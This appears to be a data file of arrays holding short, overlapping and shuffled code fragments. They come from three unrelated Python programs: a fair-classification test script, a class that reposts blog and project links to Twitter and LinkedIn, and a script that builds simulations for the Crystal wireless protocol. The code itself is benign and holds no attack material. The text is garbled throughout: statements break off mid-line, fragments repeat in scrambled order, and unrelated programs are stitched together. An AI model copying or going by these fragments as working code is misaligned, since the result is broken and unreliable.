"sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier", "0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X)", "def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False)", "'../../fair_classification/') # the code for fair classification is in this directory import utils", "X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr =", "ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if", "fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr,", "1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y,", "apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original)", "we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr,", "as ut import loss_funcs as lf # loss funcs that can be optimized", "\"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint =", "we will show 10-fold cross validation accuracy as a performance measure def test_synthetic_data():", "\"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss", "\"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a", "print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot" ]
[ "BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to", "message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self):", "Check it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message =", "tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet +", "is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check", "from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}.", "blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except:", "+ ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet + '", "Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\")", "Post: {name}. Check it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try:", "oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in", "#reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url} #reviveposts' def blog(self):", "import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it", "' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet + ' Repo:", "ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out! {url} #reviveposts'", "{url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url} #reviveposts' def", "except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except:", "'OSS Project: {name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog", ".opensourceprojects import OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin", "= BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting", "= 'OSS Project: {name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE =", "def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message)", "' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'],", "from .opensourceprojects import OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet from", "out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'],", "Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting to LinkedIn\")", "pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass", "#{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url']", "tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet =", "tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet +", "if 'type' in random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error", "it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url}", "posting to LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'],", "+ ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet + '", "it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format(", "try: if 'documentation' in random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if", "class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out! {url}", "' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet + ' #{}'.format(random_project.get('type',''))", "<gh_stars>0 from .opensourceprojects import OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet", "except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet", "{description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it", "pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try:", "import OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin import", "print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error", "PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog() def", "import BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE", "name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message,", "pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting to LinkedIn\") pass", "#reviveposts' def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] )", "tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass", "posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting", "Project: {name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post:", "if 'documentation' in random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository'", "tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post(", "in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project:", "random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\")", "random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self): random_project =", "= tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet", "= self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try:", "description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet + ' Docs:", "from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS", "OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn", "from .blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class", "#self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if", "Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository',''))", "print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet =", "{}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except:", "out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url} #reviveposts'", "to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting to", "random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet", "try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\")", "= 'Blog Post: {name}. Check it out! {url} #reviveposts' def blog(self): random_blog =", ".posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project:", "{url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link']", "if 'repository' in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type'", "random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error", "random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self): random_project", "import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name}", "BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE =", "self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post(", "PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out!", "print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error", ".postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check", "{name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}.", "= self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet +", "{}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if", "posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting", "= tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try:", "_OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE", "tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet =", "Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it out!", "to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to", "PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is", "to LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'],", "random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project:", "Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet)", "tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet", "'documentation' in random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in", "PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] )", "PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] )", "OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet =", "_BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url} #reviveposts' def blog(self): random_blog", ".blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia:", "LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url'])", ") except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get()", "in random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to", "self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet + '", "in random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project:", "url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'],", "'repository' in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in", "random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet", "+ ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet,", ") PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link']", "= OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet", "'type' in random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting", "{name}. Check it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message", "'Blog Post: {name}. Check it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get()", "try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog()", "except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except:", "url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation',''))", "message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\") pass", "try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting to LinkedIn\") pass #self.oss()", "def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation'", "= tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet" ]
[ "env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\"", "longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink,", "new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders,", "p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"]", "import copy, rmtree import traceback import subprocess import itertools import re import random", "help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import", "os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist =", "env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with", "print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\")", "ap.parse_args() import os from collections import namedtuple, OrderedDict from shutil import copy, rmtree", "= {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs,", "if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\",", "= v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z", "random.choice(nodes) if x not in r: r.append(x) l += 1 return r def", "\"nodemap.txt\")) num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict()", "OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch", "def rnd_unique(nodes, n): l = 0 r = [] while (l<n): x =", "dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter,", "testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\":", "chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\"", "= [] if seed is not None: random.seed(seed) for _ in xrange(num_epochs): tbl", "f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir)", "\"nodelist.txt\") with open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir)", "os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname,", "\".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath)", "\"using the following params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes", "+= [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags", "as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try:", "p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"]", "\"r y z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4,", "= period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] =", "= [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s,", "\"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"]", "in nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x for x in", "\"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags +=", "== \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if", "n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a", "sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l = 0", "generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed is not None: random.seed(seed) for", "simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca):", "#\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following params\" print pars", "import os from collections import namedtuple, OrderedDict from shutil import copy, rmtree import", "= n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] =", "the following params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes =", "\"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following params\" print pars globals().update(pars)", "] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in", "if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and not", "const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\" def", "binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env)", "= {\"CFLAGS\":cflags} return new_env glb = {} pars = {} execfile(params, glb, pars)", "= dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] =", "#apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath,", "\"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults = { \"period\":2,", "{ \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\",", "n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders,", "[\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags +=", "[] while (l<n): x = random.choice(nodes) if x not in r: r.append(x) l", "\"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"]", "params = args.config def rnd_unique(nodes, n): l = 0 r = [] while", "= num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] =", "in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power,", "shutil import copy, rmtree import traceback import subprocess import itertools import re import", "nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x for x in nodes", "all_senders = [x for x in nodes if x!=sink] new_env = mk_env(power, channel,", "= nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] =", "(\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"):", "set() with open(\"nodelist.txt\") as f: for l in f: l = l.strip() if", "ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power,", "p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"]", "default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os from collections import namedtuple,", "params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes = set() with", "= { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2,", "longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x", "= payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header =", "n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t", "+= 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e print \"%d", "channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca)", "\"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following params\"", "p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values = \" \".join([str(x) for x", "abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\")", "with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"]", "\"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop,", "os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: 